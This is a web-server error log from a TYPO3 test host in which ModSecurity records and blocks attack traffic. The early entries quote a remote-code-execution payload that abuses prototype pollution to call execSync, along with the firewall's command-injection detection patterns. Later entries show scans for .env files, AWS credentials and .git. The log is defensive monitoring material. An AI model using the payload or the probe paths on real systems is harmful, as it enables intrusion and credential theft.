[Sat Jan 17 16:33:26.150283 2026] [:error] [pid 1465655] [client 85.11.167.4:52126] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768664005_89',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxiFXd78sl9lQKfsM-AAAAAc"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.150441 2026] [:error] [pid 1465655] [client 85.11.167.4:52126] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768664005_89',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ta [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxiFXd78sl9lQKfsM-AAAAAc"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.150573 2026] [:error] [pid 1465655] [client 85.11.167.4:52126] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1768664005_89 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxiFXd78sl9lQKfsM-AAAAAc"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.151784 2026] [:error] [pid 1465655] [client 85.11.167.4:52126] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxiFXd78sl9lQKfsM-AAAAAc"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.151951 2026] [:error] [pid 1465655] [client 85.11.167.4:52126] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxiFXd78sl9lQKfsM-AAAAAc"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.269775 2026] [:error] [pid 1465654] [client 85.11.167.4:52130] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768664006',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxjsg88Fnk7qcsG1nHwAAAAY"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.269926 2026] [:error] [pid 1465654] [client 85.11.167.4:52130] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768664006',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxjsg88Fnk7qcsG1nHwAAAAY"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.270002 2026] [:error] [pid 1465654] [client 85.11.167.4:52130] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1768664006 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxjsg88Fnk7qcsG1nHwAAAAY"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.271469 2026] [:error] [pid 1465654] [client 85.11.167.4:52130] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxjsg88Fnk7qcsG1nHwAAAAY"], referer: https://surf.test.indacotrentino.com
[Sat Jan 17 16:33:26.271658 2026] [:error] [pid 1465654] [client 85.11.167.4:52130] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWurxjsg88Fnk7qcsG1nHwAAAAY"], referer: https://surf.test.indacotrentino.com
[Sun Jan 18 03:54:58.540119 2026] [authz_core:error] [pid 1488396] [client 209.97.180.8:58260] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sun Jan 18 03:55:01.544334 2026] [:error] [pid 1488395] [client 209.97.180.8:58288] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWxLhcmRlgkszsGIdz-iMQAAAAM"]
[Sun Jan 18 03:55:01.544575 2026] [:error] [pid 1488395] [client 209.97.180.8:58288] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWxLhcmRlgkszsGIdz-iMQAAAAM"]
[Sun Jan 18 03:55:01.544731 2026] [:error] [pid 1488395] [client 209.97.180.8:58288] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWxLhcmRlgkszsGIdz-iMQAAAAM"]
[Sun Jan 18 03:55:02.546913 2026] [:error] [pid 1488432] [client 209.97.180.8:58300] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWxLhmO7Ww9g7JovZ5CCdAAAAAc"]
[Sun Jan 18 03:55:02.547142 2026] [:error] [pid 1488432] [client 209.97.180.8:58300] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWxLhmO7Ww9g7JovZ5CCdAAAAAc"]
[Sun Jan 18 03:55:02.547288 2026] [:error] [pid 1488432] [client 209.97.180.8:58300] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWxLhmO7Ww9g7JovZ5CCdAAAAAc"]
[Sun Jan 18 03:55:04.543361 2026] [authz_core:error] [pid 1488431] [client 209.97.180.8:58304] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jan 18 08:30:46.891145 2026] [:error] [pid 1490419] [client 185.177.72.66:24832] [client 185.177.72.66] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWyMJuUEoV5KHg2hnSzkFAAAAAo"]
[Sun Jan 18 08:30:46.891322 2026] [:error] [pid 1490419] [client 185.177.72.66:24832] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWyMJuUEoV5KHg2hnSzkFAAAAAo"]
[Sun Jan 18 08:30:46.891493 2026] [:error] [pid 1490419] [client 185.177.72.66:24832] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWyMJuUEoV5KHg2hnSzkFAAAAAo"]
[Sun Jan 18 08:30:46.895656 2026] [:error] [pid 1488428] [client 185.177.72.66:24920] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWyMJmOYMY3SUwS4bRsNvgAAAAU"]
[Sun Jan 18 08:30:46.895837 2026] [:error] [pid 1488428] [client 185.177.72.66:24920] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWyMJmOYMY3SUwS4bRsNvgAAAAU"]
[Sun Jan 18 08:30:46.895985 2026] [:error] [pid 1488428] [client 185.177.72.66:24920] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aWyMJmOYMY3SUwS4bRsNvgAAAAU"]
[Sun Jan 18 08:30:46.907696 2026] [:error] [pid 1490427] [client 185.177.72.66:24904] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWyMJvOSlCB311YmT4BFHgAAABE"]
[Sun Jan 18 08:30:46.907899 2026] [:error] [pid 1490427] [client 185.177.72.66:24904] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWyMJvOSlCB311YmT4BFHgAAABE"]
[Sun Jan 18 08:30:46.908039 2026] [:error] [pid 1490427] [client 185.177.72.66:24904] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWyMJvOSlCB311YmT4BFHgAAABE"]
[Sun Jan 18 08:30:47.011578 2026] [authz_core:error] [pid 1488428] [client 185.177.72.66:24936] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Sun Jan 18 08:30:47.015574 2026] [:error] [pid 1490427] [client 185.177.72.66:24948] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.aws"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.aws"] [unique_id "aWyMJ_OSlCB311YmT4BFHwAAABE"]
[Sun Jan 18 08:30:47.015797 2026] [:error] [pid 1490427] [client 185.177.72.66:24948] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.aws"] [unique_id "aWyMJ_OSlCB311YmT4BFHwAAABE"]
[Sun Jan 18 08:30:47.015953 2026] [:error] [pid 1490427] [client 185.177.72.66:24948] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.aws"] [unique_id "aWyMJ_OSlCB311YmT4BFHwAAABE"]
[Sun Jan 18 08:30:47.103931 2026] [authz_core:error] [pid 1488686] [client 185.177.72.66:25002] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Sun Jan 18 08:30:47.105723 2026] [:error] [pid 1488428] [client 185.177.72.66:25016] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.netlify"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.netlify"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwAAAAAU"]
[Sun Jan 18 08:30:47.105948 2026] [:error] [pid 1488428] [client 185.177.72.66:25016] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.netlify"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwAAAAAU"]
[Sun Jan 18 08:30:47.106083 2026] [:error] [pid 1488428] [client 185.177.72.66:25016] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.netlify"] [unique_id "aWyMJ2OYMY3SUwS4bRsNwAAAAAU"]
